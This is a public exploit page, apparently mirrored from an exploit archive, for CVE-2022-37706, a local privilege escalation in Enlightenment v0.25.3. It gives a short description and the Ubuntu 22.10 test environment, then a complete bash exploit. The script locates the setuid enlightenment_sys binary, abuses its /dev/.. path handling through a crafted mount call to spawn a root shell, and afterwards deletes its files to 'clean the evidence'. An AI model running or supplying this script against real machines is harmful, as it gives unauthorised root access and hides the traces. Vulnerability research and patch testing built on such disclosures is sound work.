扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation ## Author: nu11secur1ty ## Date: 12.26.2022 ## Vendor: https://www.enlightenment.org/ ## Software: https://www.enlightenment.org/download ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 ## CVE ID: CVE-2022-37706 ## Description: The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. Enlightenment_sys in Enlightenment before 0.25.3 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring If the attacker has access locally to some machine on which the machine is installed Enlightenment he can use this vulnerability to do very dangerous stuff. ## STATUS: CRITICAL Vulnerability ## Tested on: </code><code>bash DISTRIB_ID=Ubuntu DISTRIB_RELEASE=22.10 DISTRIB_CODENAME=kinetic DISTRIB_DESCRIPTION="Ubuntu 22.10" PRETTY_NAME="Ubuntu 22.10" NAME="Ubuntu" VERSION_ID="22.10" VERSION="22.10 (Kinetic Kudu)" VERSION_CODENAME=kinetic ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=kinetic LOGO=ubuntu-logo </code><code> [+] Exploit: </code><code>bash #!/usr/bin/bash # Idea by MaherAzzouz # Development by nu11secur1ty echo "CVE-2022-37706" echo "[*] Trying to find the vulnerable SUID file..." echo "[*] This may take few seconds..." # The actual problem file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Welcome to the rabbit hole :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net read -p "Press any key to clean the evedence..." echo -e "Please wait... " sleep 5 rm -rf /tmp/exploit rm -rf /tmp/net echo -e "Done; Everything is clear ;)" </code><code> ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706) ## Proof and Exploit: [href](https://streamable.com/zflbgg) ## Time spent 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> |
体验盒子
